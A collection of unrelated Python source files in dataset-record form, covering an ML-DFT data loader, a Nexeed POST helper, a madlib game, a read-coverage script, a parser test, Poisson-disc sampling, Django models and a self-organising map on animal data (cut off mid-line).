test_fp_np = None\n test_ldos_np = None\n\n hvd.allreduce(torch.tensor(0), name='barrier')\n \n\n # Pick subset of FP vector that the user requested\n fp_idxs = subset_fp(args)\n\n if (hvd.rank() == 0):\n print(\"Subsetting FP dataset\")\n print(\"FP_idxs: \", fp_idxs)\n\n full_train_fp_np = full_train_fp_np[:, :, :, :, fp_idxs]\n validation_fp_np = validation_fp_np[:, :, :, fp_idxs]\n if (not args.no_testing):\n test_fp_np = test_fp_np[:, :, :, fp_idxs]\n\n\n # Pick subset of LDOS vector that the user requested\n ldos_idxs = subset_ldos(args)\n\n if (hvd.rank() == 0):\n print(\"Subsetting LDOS dataset\") \n 
print(\"LDOS_idxs: \", ldos_idxs)\n \n full_train_ldos_np = full_train_ldos_np[:, :, :, :, ldos_idxs]\n validation_ldos_np = validation_ldos_np[:, :, :, ldos_idxs]\n if (not args.no_testing):\n test_ldos_np = test_ldos_np[:, :, :, ldos_idxs]\n\n\n fp_shape = validation_fp_np.shape\n ldos_shape = validation_ldos_np.shape\n\n fp_pts = fp_shape[0] * fp_shape[1] * fp_shape[2]\n ldos_pts = ldos_shape[0] * ldos_shape[1] * ldos_shape[2]\n\n # Grid inconsistent\n if (fp_pts != ldos_pts):\n print(\"\\n\\nError in num grid points: fp_pts %d and ldos_pts %d\\n\\n\" % (fp_pts, ldos_pts));\n exit(0);\n\n # Bidirection with density prediction\n if (ldos_shape[3] == 1 and (args.model_lstm_network and not args.no_bidirection)):\n print(\"\\n\\nError cannot use bidirectional LSTM when predicting densities. Please use unidirectional LSTM or Feedforward only. Exiting.\\n\\n\")\n exit(0);\n\n\n args.grid_pts = fp_pts\n\n args.train_pts = args.grid_pts * args.num_train_snapshots\n args.validation_pts = args.grid_pts\n args.test_pts = args.grid_pts\n\n # Vector lengths\n args.fp_length = fp_shape[3]\n args.ldos_length = ldos_shape[3]\n\n \n if (hvd.rank() == 0):\n print(\"Grid_pts %d\" % args.grid_pts)\n print(\"Train_pts %d\" % args.train_pts)\n print(\"Validation_pts %d\" % args.validation_pts)\n print(\"Test pts %d\" % args.test_pts)\n print(\"Final FP vector length: %d\" % args.fp_length)\n print(\"Final LDOS vector length: %d\" % args.ldos_length)\n print(\"Reshaping Datasets\")\n \n\n # Reshape tensor datasets such that \n # NUM_SNAPSHOTS x 200 x 200 x 200 x VEC_LEN => (NUM_SNAPSHOTS * 200^3) x VEC_LEN\n full_train_fp_np = full_train_fp_np.reshape([args.train_pts, args.fp_length])\n full_train_ldos_np = full_train_ldos_np.reshape([args.train_pts, args.ldos_length])\n\n validation_fp_np = validation_fp_np.reshape([args.validation_pts, args.fp_length])\n validation_ldos_np = validation_ldos_np.reshape([args.validation_pts, args.ldos_length])\n \n if (not args.no_testing):\n test_fp_np = test_fp_np.reshape([args.test_pts, args.fp_length])\n test_ldos_np = test_ldos_np.reshape([args.test_pts, args.ldos_length])\n \n\n # Scale fingerprints\n full_train_fp_np, validation_fp_np, test_fp_np = \\\n scale_data(args, \"fp\", \\\n full_train_fp_np, \\\n validation_fp_np, \\\n test_fp_np, \\\n args.fp_log, \\\n args.fp_row_scaling, \\\n args.fp_norm_scaling,\\\n args.fp_max_only, \\\n args.fp_standard_scaling)\n\n hvd.allreduce(torch.tensor(0), name='barrier')\n \n # Scale ldos\n full_train_ldos_np, validation_ldos_np, test_ldos_np = \\\n scale_data(args, \"ldos\", \\\n full_train_ldos_np, \\\n validation_ldos_np, \\\n test_ldos_np, \\\n args.ldos_log, \\\n args.ldos_row_scaling, \\\n args.ldos_norm_scaling,\\\n args.ldos_max_only, \\\n args.ldos_standard_scaling)\n\n\n # Save modified input/outputs\n if (hvd.rank() == 0 and args.save_training_data):\n\n print(\"Saving training data.\")\n\n np.save(args.model_dir + \"/full_train_fp_np\", full_train_fp_np)\n np.save(args.model_dir + \"/validation_fp_np\", validation_fp_np)\n np.save(args.model_dir + \"/test_fp_np\", test_fp_np)\n\n np.save(args.model_dir + \"/full_train_ldos_np\", full_train_ldos_np)\n np.save(args.model_dir + \"/validation_ldos_np\", validation_ldos_np)\n np.save(args.model_dir + \"/test_ldos_np\", test_ldos_np)\n\n\n\n # Create Pytorch tensors\n\n hvd.allreduce(torch.tensor(0), name='barrier')\n\n print(\"Rank: %d, Creating train tensors\" % hvd.rank())\n # Create PyTorch Tensors (and Datasets X/Y) from numpy arrays\n full_train_fp_torch = 
torch.tensor(full_train_fp_np, dtype=torch.float32)\n hvd.allreduce(torch.tensor(0), name='barrier')\n \n full_train_ldos_torch = torch.tensor(full_train_ldos_np, dtype=torch.float32)\n hvd.allreduce(torch.tensor(0), name='barrier')\n\n\n print(\"Rank: %d, Creating validation tensors\" % hvd.rank()) \n validation_fp_torch = torch.tensor(validation_fp_np, dtype=torch.float32)\n hvd.allreduce(torch.tensor(0), name='barrier')\n \n validation_ldos_torch = torch.tensor(validation_ldos_np, dtype=torch.float32)\n hvd.allreduce(torch.tensor(0), name='barrier')\n\n\n print(\"Rank: %d, Creating test tensors\" % hvd.rank()) \n test_fp_torch = torch.tensor(test_fp_np, dtype=torch.float32)\n hvd.allreduce(torch.tensor(0), name='barrier')\n\n test_ldos_torch = torch.tensor(test_ldos_np, dtype=torch.float32) \n hvd.allreduce(torch.tensor(0), name='barrier')\n\n\n print(\"Rank: %d, Creating tensor datasets\" % hvd.rank())\n # Create fp (inputs) and ldos (outputs) Pytorch Dataset\n train_dataset = torch.utils.data.TensorDataset(full_train_fp_torch, full_train_ldos_torch)\n hvd.allreduce(torch.tensor(0), name='barrier')\n \n validation_dataset = torch.utils.data.TensorDataset(validation_fp_torch, validation_ldos_torch)\n hvd.allreduce(torch.tensor(0), name='barrier')\n \n test_dataset = torch.utils.data.TensorDataset(test_fp_torch, test_ldos_torch)\n hvd.allreduce(torch.tensor(0), name='barrier')\n\n\n return (train_dataset, validation_dataset, test_dataset)\n\n\n\n\n\n\n\n\n###-----------------------------------------------------------------------###\n\n# Normalize FP or LDOS\ndef scale_data(args, data_name, \\\n data_train, data_validation, data_test, \\\n apply_log=False, \\\n row_scaling=False, \\\n norm_scaling=False, max_only=False, \\\n standard_scaling=False):\n\n if (data_test == None and not args.calc_training_norm_only):\n if (hvd.rank() == 0):\n print(\"\\n\\nData_test is set as place holder. Scaler calculation is off.\\n\\n\")\n data_test = np.ones([1, data_train.shape[1]])\n elif (data_test == None):\n data_test = np.ones([1, data_train.shape[1]])\n\n if (len(data_train.shape) != 2 or len(data_validation.shape) != 2 or len(data_test.shape) != 2):\n if (hvd.rank() == 0):\n print(\"\\nIssue in %s data shape lengths (train, valid, test): (%d, %d, %d), expected length 2. Exiting.\\n\\n\" \\\n % (data_name, len(data_train.shape), len(data_validation.shape), len(data_test.shape)))\n exit(0);\n \n # Number of elements in each sample vector\n data_length = data_train.shape[1]\n\n # Apply log function to the data\n if (apply_log):\n if (hvd.rank() == 0):\n print(\"Applying Log function to %s\" % data_name) \n\n train_min = np.min(data_train)\n validation_min = np.min(data_validation)\n test_min = np.min(data_test)\n \n log_shift = np.array([1e-8])\n\n train_min += log_shift\n validation_min += log_shift\n test_min += log_shift\n\n if (train_min <= 0.0 or validation_min <= 0.0 or test_min <= 0.0):\n if (hvd.rank() == 0):\n print(\"\\nApplying the log fn to %s fails because there are values <= 0. 
Exiting.\\n\\n\" % data_name)\n exit(0);\n\n np.save(args.model_dir + \"/%s_log_shift\" % data_name, log_shift)\n\n data_train = np.log(data_train + log_shift)\n data_validation = np.log(data_validation + log_shift)\n data_test = np.log(data_test + log_shift)\n \n # Row vs total scaling\n if (row_scaling and (norm_scaling or standard_scaling)):\n scaling_factors = np.zeros([2, data_length])\n scaling_factors_fname = \"/%s_factor_row\" % data_name\n else:\n scaling_factors = np.zeros([2, 1])\n scaling_factors_fname = \"/%s_factor_total\" % data_name\n\n # Scale features\n if (norm_scaling or standard_scaling):\n # Apply data normalizations\n for row in range(data_length):\n\n # Row scaling\n if (row_scaling):\n if (standard_scaling):\n\n if (args.calc_training_norm_only):\n data_meanv = np.mean(data_train[:, row]) \n data_stdv = np.std(data_train[:, row])\n \n else: \n data_meanv = np.mean(np.concatenate((data_train[:, row], \\\n data_validation[:, row], \\\n data_test[:, row]), axis=0))\n data_stdv = np.std(np.concatenate((data_train[:, row], \\\n data_validation[:, row], \\\n data_test[:, row]), axis=0))\n \n data_train[:, row] = (data_train[:, row] - data_meanv) / data_stdv\n data_validation[:, row] = (data_validation[:, row] - data_meanv) / data_stdv\n data_test[:, row] = (data_test[:, row] - data_meanv) / data_stdv\n \n scaling_factors[0, row] = data_meanv\n scaling_factors[1, row] = data_stdv\n\n else:\n if (max_only):\n data_minv = 0\n else:\n if (args.calc_training_norm_only):\n data_minv = np.min(data_train[:, row])\n else:\n data_minv = np.min(np.concatenate((data_train[:, row], \\\n data_validation[:, row], \\\n data_test[:, row]), axis=0))\n if (args.calc_training_norm_only):\n data_maxv = np.max(data_train[:, row])\n else:\n data_maxv = np.max(np.concatenate((data_train[:, row], \\\n data_validation[:, row], \\\n data_test[:, row]), axis=0))\n\n if (data_maxv - data_minv < 1e-12):\n print(\"\\nNormalization of %s error. max-min ~ 0. Exiting. \\n\\n\" % data_name)\n exit(0);\n \n data_train[:, row] = (data_train[:, row] - data_minv) / (data_maxv - data_minv)\n data_validation[:, row] = (data_validation[:, row] - data_minv) / (data_maxv - data_minv)\n data_test[:, row] = (data_test[:, row] - data_minv) / (data_maxv - data_minv)\n \n # No row scaling\n else:\n if (standard_scaling):\n\n if (args.calc_training_norm_only):\n data_mean = np.mean(data_train)\n data_std = np.std(data_train)\n\n else:\n data_mean = np.mean(np.concatenate((data_train, \\\n data_validation, \\\n data_test), axis=0))\n data_std = np.std(np.concatenate((data_train, \\\n data_validation, \\\n data_test), axis=0))\n \n data_train = (data_train - data_mean) / data_std\n data_validation = (data_validation - data_mean) / data_std\n data_test = (data_test - data_mean) / data_std\n \n scaling_factors[0, row] = data_mean\n scaling_factors[1, row] = data_std\n \n else: \n if (max_only):\n data_min = 0\n else:\n if (args.calc_training_norm_only):\n data_min = np.min(data_train)\n else:\n data_min = np.min(np.concatenate((data_train, \\\n data_validation, \\\n data_test), axis=0)) \n if (args.calc_training_norm_only):\n data_max = np.max(data_train)\n else:\n data_max = np.max(np.concatenate((data_train, \\\n data_validation, \\\n data_test), axis=0))\n \n if (data_max - data_min < 1e-12):\n print(\"\\nNormalization of %s error. max-min ~ 0. 
Exiting\\n\\n\" % data_name)\n exit(0);\n\n data_train = (data_train - data_min) / (data_max - data_min)\n data_validation = (data_validation - data_min) / (data_max - data_min)\n data_test = (data_test - data_min) / (data_max - data_min)\n\n scaling_factors[0, row] = data_min\n scaling_factors[1, row] = data_max\n\n\n if (hvd.rank() == 0):\n if (row_scaling):\n if (standard_scaling):\n print(\"%s Row: %g, Mean: %4.4f, Std: %4.4f\" % (data_name, row, scaling_factors[0, row], scaling_factors[1, row]))\n else:\n print(\"%s Row: %g, Min: %4.4f, Max: %4.4f\" % (data_name, row, scaling_factors[0, row], scaling_factors[1, row]))\n else: \n if (standard_scaling):\n print(\"%s Total, Mean: %4.4f, Std: %4.4f\" % (data_name, scaling_factors[0, 0], scaling_factors[1, 0]))\n else:\n print(\"%s Total, Min: %4.4f, Max: %4.4f\" % (data_name, scaling_factors[0, 0], scaling_factors[1, 0]))\n\n if (row == 0):\n if (row_scaling):\n if (standard_scaling):\n scaling_factors_fname += \"_standard_mean_std\"\n else:\n scaling_factors_fname += \"_min_max\"\n\n else: \n if (standard_scaling):\n scaling_factors_fname += \"_standard_mean_std\"\n else:\n scaling_factors_fname += \"_min_max\"\n\n # No Row scaling\n break;\n \n # No LDOS scaling\n else: \n if (hvd.rank() == 0):\n print(\"Not applying scaling to %s.\" % data_name)\n # Identity scaling\n scaling_factors[0,0] = 0.0\n scaling_factors[1,0] = 1.0\n scaling_factors_fname += \"_min_max\"\n \n # Save normalization coefficients\n np.save(args.model_dir + scaling_factors_fname, scaling_factors)\n\n hvd.allreduce(torch.tensor(0), name='barrier')\n\n return (data_train, data_validation, data_test)\n\n\n\n\n\n\n\n###-----------------------------------------------------------------------###\n\n# Take subset of FP inputs\n# Options:\n# --power-spectrum-only\n# --no-coords\n# --no-bispectrum\ndef subset_fp(args): \n\n # No subset requested\n if (not (args.no_bispectrum or args.power_spectrum_only or args.no_coords)):\n return np.arange(args.fp_length)\n\n\n # Store subset elements\n fp_idxs = np.array([])\n\n if (args.no_bispectrum):\n if(hvd.rank() == 0):\n print(\"Removing bispectrum components from the SNAP FP (use coords only).\")\n\n return (np.append(fp_idxs, [0,1,2])).astype(int)\n\n\n # User only the power spectrum elements in fingerprints\n if (args.power_spectrum_only):\n if(hvd.rank() == 0):\n print(\"Using FP power spectrum only.\")\n\n fp_idxs = np.append(fp_idxs, [0,1,2])\n\n bs_length = args.fp_length - 3\n twojmax = 0\n\n count = 0\n while (count < bs_length): \n twojmax += 1\n \n count = 0\n for j1 in range(0, twojmax + 1):\n for j2 in range(0, j1 + 1):\n for j in range(j1 - j2, min(twojmax, j1 + j2) + 1, 2):\n\n if (j >= j1): \n if (j2 == 0):\n fp_idxs = np.append(fp_idxs, count + 3) \n count += 1\n\n print(\"Rank: %d, twojmax %d, bs_length %d\" % (hvd.rank(), twojmax, count))\n \n fp_idxs = fp_idxs.astype(int)\n print(\"Power Spectrum idx: \", fp_idxs)\n\n if (count != bs_length):\n print(\"Error: could not find power spectrum. 
bs_length = %d and counted_elements = %d\" % (bs_length, count))\n else:\n fp_idxs = np.arange(args.fp_length)\n\n # The first 3 elements in FPs are coords and the rest are bispectrum components\n if (args.no_coords):\n if(hvd.rank() == 0):\n print(\"Removing X/Y/Z coords from the SNAP FP.\")\n fp_idxs = fp_idxs[3:]\n\n else:\n if(hvd.rank() == 0):\n print(\"Removing X/Y/Z coords from the SNAP FP.\")\n \n return fp_idxs.astype(int)\n\n\n# Take subset of LDOS outputs\n# Current no option available\ndef subset_ldos(args):\n fstart = args.feat_start\n fstop = args.feat_stop\n\n sub_idxs = np.arange(fstart, fstop)\n\n return sub_idxs.astype(int)\n #return np.arange(args.ldos_length)\n","sub_path":"ml-dft-sandia/networks/models/fp_ldos_feedforward/src/data_loaders.py","file_name":"data_loaders.py","file_ext":"py","file_size_in_byte":30261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"558409500","text":"import requests\nimport json\n\n\ndef Nexeedpost(payload):\n # sending post request and saving response as response object\n url = \"https://demo.bosch-nexeed.com/cpm/ppm/v3/measurement\"\n\n headers = {\n \"Content-Type\": \"application/json\"\n }\n\n try:\n r = requests.post(url, data=json.dumps(payload), headers=headers)\n\n pastebin_url = r.content\n\n # Response from Bosch URL\n if pastebin_url == \"{}\":\n print(\"Successfully Posted to Nexeed\")\n else:\n print(\"URL Response: %s\" % pastebin_url)\n\n except:\n print(\"Nexeed unreachable\")\n\n","sub_path":"App/Post_to_Nexeed.py","file_name":"Post_to_Nexeed.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"178490553","text":"import re\n\ndef welcome_print():\n print(\"\"\" \n Welcome to madlib game!\n all you need is to think of an example of the below vocabs \n \"\"\")\n\ndata=['Adjective','Adjective','A First Name','Past Tense Verb','A First Name','Adjective','Adjective',\n'Plural Noun','Large Animal','Small Animal',\"A Girl's Nam\",'Adjective','Plural Noun','Adjective','Plural Noun',\n'Number 1-50',\"First Name's\",'Number','Plural Noun','Number','Plural Noun']\n\nnew_data=[]\n\ndef input_vocabs():\n for i in range (len(data)):\n input_val=input('>> Enter %s '%(data[i]))\n new_data.append(input_val)\n\n\nif __name__== '__main__':\n welcome_print()\n input_vocabs() \n\n\ndef read_template(path):\n try:\n with open(path) as file:\n return file.read()\n except FileNotFoundError :\n raise FileNotFoundError('The file not found')\n \n\ndef parse_template(read_script):\n modified_script=re.sub('{[^}]+}','{}',read_script)\n removed_str_parts=tuple(re.findall(\"{(.*?)}\",read_script))\n return modified_script, removed_str_parts\n\n\ndef merge(parsed_script,user_input):\n return parsed_script.format(*user_input)\n\n\n\ndef script_copy(merged_script):\n with open('./assets/new_assets.txt','wb') as script_write:\n return script_write.write(bytes(merged_script,'utf-8'))","sub_path":"madlib_cli/madlib.py","file_name":"madlib.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"478706758","text":"import argparse\nimport numpy as np\nfrom operator import itemgetter\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n#############################################################################\n# Purpose: input a fasta table that contains the parsed output of bwa and calculate 
xcoverage of each contig\n# Decisions:\n# 1) When both sides of a read fall on same contig then add one to the coverage for bp from first tail to second tail of read\n# 2) When only side of a read fall on same contig then only add coverage to the bp that fall directly on that one read side (from tail to head)\n# 3) When done with calculating coverage along all contigs, take the median base coverage of that contig and divide it by \n# the length of that contig to get the xcoverage stat\n# \n#############################################################################\n\nparser = argparse.ArgumentParser(description='rename reads to have FW and RV')\nparser.add_argument('ifn_bwa_table', metavar='', type=str, help='assembly output of contigs')\nparser.add_argument('ifn_name_map', metavar='', type=str, help='Original_contig new_contig')\nparser.add_argument('ofn_contig_coverage', metavar='', type=str, help='renamed fasta')\nparser.add_argument('ofn_contig_coverage_whole_molecules_dir', metavar='', type=str, help='renamed fasta')\n\nargs = parser.parse_args()\n\n\n# connect contig name to length\n# initialize a 0-array that is the length of a contig connected to the name of a contig\ncontig_to_cov_table = {}\nwith open(args.ifn_name_map) as contigs:\n for line in contigs:\n line = line.split()\n contig = line[1]\n length = int(line[2])\n contig_to_cov_table[contig] = np.zeros((length,), dtype=int)\n\nmap_col_index = {}\nwith open(args.ifn_bwa_table) as mapfile:\n line = mapfile.readline()\n header = line.split()\n index = 0\n for col in header:\n map_col_index[col] = index\n index += 1\n\nwith open(args.ifn_bwa_table) as mapfile:\n next(mapfile)\n linenum = 1\n for line in mapfile:\n linenum += 1\n pair = line.split()\n strand1 = pair[map_col_index['strand1']]\n strand2 = pair[map_col_index['strand2']]\n contig1 = pair[map_col_index['contig1']]\n contig2 = pair[map_col_index['contig2']]\n if (contig1 == contig2) & (strand1 == strand2):\n print(contig1,contig2,strand1,strand2)\n continue\n head1 = int(pair[map_col_index['coord1']])\n head2 = int(pair[map_col_index['coord2']])\n tail1 = int(pair[map_col_index['back_coord1']])\n tail2 = int(pair[map_col_index['back_coord2']])\n if contig1 == contig2:\n if strand1 == '1': \n start_coord = tail1-1\n stop_coord = tail2\n else: \n start_coord = tail2-1\n stop_coord = tail1\n for bp in range(start_coord,stop_coord):\n contig_to_cov_table[contig1][bp] += 1\n else:\n if strand1 == '1':\n start_coord = tail1 - 1\n stop_coord = head1\n else:\n start_coord = head1 - 1\n stop_coord = tail1\n for bp in range(start_coord,stop_coord):\n contig_to_cov_table[contig1][bp] += 1\n if strand2 == '1':\n start_coord = tail2 - 1\n stop_coord = head2\n else:\n start_coord = head2 - 1\n stop_coord = tail2\n for bp in range(start_coord,stop_coord):\n contig_to_cov_table[contig2][bp] += 1\n\n\nographdir = args.ofn_contig_coverage_whole_molecules_dir\nofile = open(args.ofn_contig_coverage,'w+')\ncontig_covs = [(k,v) for k,v in contig_to_cov_table.items()]\nsorted_contig_covs = sorted(contig_covs, key=itemgetter(0))\nofile.write(\"contig coverage\\n\")\n\n\nfor item in sorted_contig_covs:\n contig = item[0]\n cov_arr = contig_to_cov_table[contig]\n contig_length = len(cov_arr)\n median_cov = np.sum(cov_arr)/contig_length\n ofile.write(contig + \" \" + str(median_cov) + \"\\n\")\n hist = plt.plot(range(contig_length),cov_arr)\n plt.title(contig + \"coverage distribution\")\n plt.xlabel('base')\n plt.ylabel('coverage')\n ofn_graph = ographdir + '/' + contig + '_cov.pdf'\n 
plt.savefig(ofn_graph)\n plt.close()\n\n \n \n ","sub_path":"md/Python/get_coverage.py","file_name":"get_coverage.py","file_ext":"py","file_size_in_byte":4517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"1195482","text":"# -*- coding: utf-8 -*-\r\nfrom unittest import mock\r\nimport unittest\r\n\r\nfrom bs4 import BeautifulSoup\r\n\r\nimport parsers\r\nfrom parsers.grandbulvar import GrandBulvarParser\r\nfrom parsers.vparsers import StatusParser\r\n\r\nfrom tests.parsers import ParserTestCaseMixin\r\n\r\n\r\n@mock.patch.object(parsers.grandbulvar.RequestMixin, \"send_request\")\r\nclass GrandBulvarParserTest(ParserTestCaseMixin, unittest.TestCase):\r\n \r\n content = [\r\n BeautifulSoup(\r\n \"\"\"\r\n
    <!-- Fixture markup lost in extraction (HTML tags stripped); recoverable content only: -->\r\n
    <!-- apartment card: area 48 m2; unit A.0.01 / Invest -->\r\n
    <!-- Pokoje: 2; Taras: -; Piętro: 0; Status: Zajęte -->\r\n
    <!-- room table (LP / Nazwa pomieszczenia / Pow. (m2)): -->\r\n
    <!-- 1 korytarz 4.90; 2 salon+aneks kuchenny 23.82; 3 pokój 12.64; 4 łazienka 5.91 -->\r\n
    <!-- links: Zadaj pytanie, Pobierz kartę -->\r\n
    \r\n \"\"\", \"lxml\")\r\n ]\r\n content_empty = [ BeautifulSoup(\"\", \"lxml\") ]\r\n \r\n parser = GrandBulvarParser\r\n records_count = 1\r\n test_record_index = 0\r\n test_record = {\r\n \"number\": \"A.0.01 / Invest\",\r\n \"rooms\": 2,\r\n \"area\": 48.0,\r\n \"floor\": 0,\r\n \"status\": StatusParser.RESERVED,\r\n \"plan\": \"http://rockfield.pl/wp-content/uploads/2017/11/A.0.01-APARTAMENT.pdf\",\r\n \"fid\": \"A.0.01 / Invest\"\r\n }","sub_path":"tests/parsers/test_grandbulvar.py","file_name":"test_grandbulvar.py","file_ext":"py","file_size_in_byte":5537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"63033781","text":"from matplotlib.pyplot import imshow\nfrom numpy import *\nfrom random import sample\n\n\ndef translate_point(point, translation):\n print(point, translation)\n return (point[0] + translation[0]), (point[1] + translation[1])\n\ndef generate_candidates(point, selector, n):\n candidates = set()\n while len(candidates) < n:\n # generate random points inside the selector's bounding box\n metacandidate = random.randint(0, selector.shape[0]),\\\n random.randint(0, selector.shape[1])\n # accept points covered by the selector\n if selector[metacandidate]:\n candidates.add(metacandidate)\n candidates = [translate_point(candidate, point) for candidate in candidates]\n return candidates\n\ndef distance_between_points(point_1, point_2):\n # Pythagorean theorem\n return sqrt((point_1[0] - point_2[0])**2 + (point_1[1] - point_2[1])**2)\n\ndistance_between_points((1, 1), (5, 4))\n\ndef generate_annular_selector(r_o, r_i):\n size = int(ceil(2 * r_o + 1))\n center = (r_o, r_o)\n selector = zeros((size, size)) # bounding box\n for y in range(size):\n for x in range(size):\n distance = distance_between_points((x, y), center)\n if distance > r_i and distance < r_o + 1:\n selector[y][x] = 1\n return selector\n\ndef check_collisions(grid, candidate, collider):\n collider_t = [translate_point(point, candidate)\n for point in grid_to_list(collider)]\n for point in collider_t:\n if grid[point]:\n return True\n return False\n\n\nif __name__ == \"__main__\":\n r = 3.0\n sx = 15 # Physical grid size (external units, e.g. 
meters)\n    sy = 15\n    n_candidates = 30\n    n = sx * sy\n    cell_size_upper_bound = r / sqrt(n)\n    cell_size = 10 ** (ceil(log10(cell_size_upper_bound)) - 1)\n\n    s1 = int(sx / cell_size) # Logical grid size (internal units for Bridson's algorithm)\n    s2 = int(sy / cell_size)\n    sr = r / cell_size # Logical Poisson disc radius\n\n    grid = zeros((s1, s2))\n    grid = grid.astype(int)\n    grid.fill(-1)\n    start_point = random.randint(0, grid.shape[0]), random.randint(0, grid.shape[1])\n\n    grid[start_point] = 0 # 0 is the first point index so can be hardcoded\n    active_points = {start_point} # Start the active points set\n\n    # the selectors are constant, so build them once outside the loop;\n    # NOTE: the original passed the physical radius r here although the\n    # logical radius sr computed above matches the grid's units\n    annulus = generate_annular_selector(2 * sr, sr)\n    collider = generate_annular_selector(sr, 0)\n\n    while active_points:\n        # sample() needs a sequence, so materialise the set first\n        active_point = sample(list(active_points), 1)[0]\n        candidates = generate_candidates(active_point, annulus, n_candidates)\n        succeeded = False\n        for candidate in candidates:\n            # discard candidates that fall outside the grid\n            if not (0 <= candidate[0] < grid.shape[0] and 0 <= candidate[1] < grid.shape[1]):\n                continue\n            if not check_collisions(grid, candidate, collider): # check if point can fit\n                active_points.add(candidate) # add point to active_points\n                grid[candidate] = len(active_points) - 1 # candidate is a tuple index; add its index to the grid\n                succeeded = True\n        if not succeeded:\n            active_points.remove(active_point)\n","sub_path":"poisson.py","file_name":"poisson.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"520161028","text":"from django.db import models\nfrom django.conf import settings\n\n# on_delete is required from Django 2.0 onwards; CASCADE matches the old default\nclass Funcionario(models.Model):\n\tuser = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n\nclass Agenda(models.Model):\n\tevento = models.CharField(max_length=100)\n\tlugar = models.CharField(max_length=200)\n\tfecha_inicio = models.DateTimeField()\n\tfecha_fin = models.DateTimeField()\n\tcomentario = models.TextField()\n\tinvitados = models.ManyToManyField(Funcionario)\n\ttipo = models.CharField(max_length=15)\n\nclass Evidencia(models.Model):\n\tcomentario = models.TextField()\n\tarchivo = models.FileField(upload_to='evidencia')\n\tagenda = models.ForeignKey(Agenda, on_delete=models.CASCADE)\n\tfuncionario = models.ForeignKey(Funcionario, on_delete=models.CASCADE)\n","sub_path":"apps/agenda/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"532510213","text":"\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport math\r\n\r\n\r\ndef read_animals():\r\n\t# returns a list of animals, each a list of 84 binary attributes\r\n\tf = open('animals.dat','r')\r\n\tanimal_list = []\r\n\tfor _ in range(32):\r\n\t\tanimal = []\r\n\t\tfor _ in range(84):\r\n\t\t\tattribute = f.read(1)\r\n\t\t\tanimal.append(int(attribute))\r\n\t\t\tf.read(1) # skip the separator between attributes\r\n\t\tanimal_list.append(animal)\r\n\treturn animal_list\r\ndef read_animals_names():\r\n\t# returns a list with animal names\r\n\tf = open('animalnames.dat','r')\r\n\tanimal_list = []\r\n\tfor _ in range(32):\r\n\t\tanimal_list.append(f.readline())\r\n\r\n\treturn animal_list\r\ndef similarity(animal,W):\r\n\t# index of the weight vector (node) closest to this animal\r\n\td = None\r\n\tindex = None\r\n\tfor i in range(len(W)):\r\n\t\tdist = float((animal - W[i])*np.transpose(animal - W[i]))\r\n\t\tif i == 0:\r\n\t\t\td = dist\r\n\t\t\tindex = 0\r\n\t\telif dist < d:\r\n\t\t\td = dist\r\n\t\t\tindex = i\r\n\treturn index\r\n\r\ndef output(animal_list,W):\r\n\tlist_of_index_values = []\r\n\tanimal_index = 0\r\n\tfor animal in animal_list:\r\n\t\tanimal_index = animal_index + 1\r\n\t\td = None\r\n\t\tindex = None\r\n\t\tfor i in 
range(len(W)):\r\n\t\t\tdist = float((animal - W[i])*np.transpose(animal - W[i]))\r\n\r\n\t\t\tif i == 0:\r\n\t\t\t\td = dist\r\n\t\t\t\tindex = i\r\n\t\t\telif dist < d:\r\n\t\t\t\td = dist\r\n\t\t\t\tindex = i\r\n\t\tlist_of_index_values.append([index,animal_index])\r\n\treturn list_of_index_values\r\n\r\n\r\ndef initialize_weights(nodes, input_dimension):\r\n\t# one weight row per node; each of the input_dimension attributes gets its own weight\r\n\tW = np.matrix(np.random.uniform(0,1,input_dimension))\r\n\tfor x in range(nodes-1):\r\n\t\tW = np.r_[W,np.matrix(np.random.uniform(0,1,input_dimension))]\r\n\treturn W\r\n\r\ndef sequential_iteration(animal_list,W,neighbourhood,step):\r\n\tfor animal in animal_list:\r\n\r\n\t\tindex = similarity(animal,W)\r\n\t\tif neighbourhood == 0:\r\n\t\t\tW[index] = W[index] + step*(animal-W[index])\r\n\t\telse:\r\n\t\t\t# update the winner and its neighbours, clipped to the node range\r\n\t\t\tfor i in range(neighbourhood*2+1):\r\n\t\t\t\tind = int(i + index - neighbourhood)\r\n\t\t\t\tif 0 <= ind <= len(W)-1:\r\n\t\t\t\t\tW[ind] = W[ind] + step*(animal-W[ind])\r\n\r\n\treturn W\r\ndef epoch_iteration(iterations,animal_list,W,neighbourhood,step,original_neighbourhood):\r\n\tfor _ in range(iterations):\r\n\t\tW = sequential_iteration(animal_list,W,int(neighbourhood-2),step)\r\n\t\t# shrink the neighbourhood linearly towards zero over the epochs\r\n\t\tneighbourhood = neighbourhood - (original_neighbourhood/iterations)\r\n\treturn W\r\ndef main():\r\n\tneighbourhood = 52\r\n\tstep = 0.2\r\n\titerations = 20\r\n\tnodes = 100\r\n\tanimal_list = np.matrix(read_animals())\r\n\tW = initialize_weights(nodes,84)\r\n\tW = epoch_iteration(iterations,animal_list,W,neighbourhood,step,neighbourhood)\r\n\tout = output(animal_list,W)\r\n\tout_list = []\r\n\tnames_list = read_animals_names()\r\n\tfor x in range(nodes):\r\n\t\tlist_in_list = []\r\n\t\tfor y in out:\r\n\t\t\tif y == []:\r\n\t\t\t\tbreak\r\n\t\t\tif y[0] == 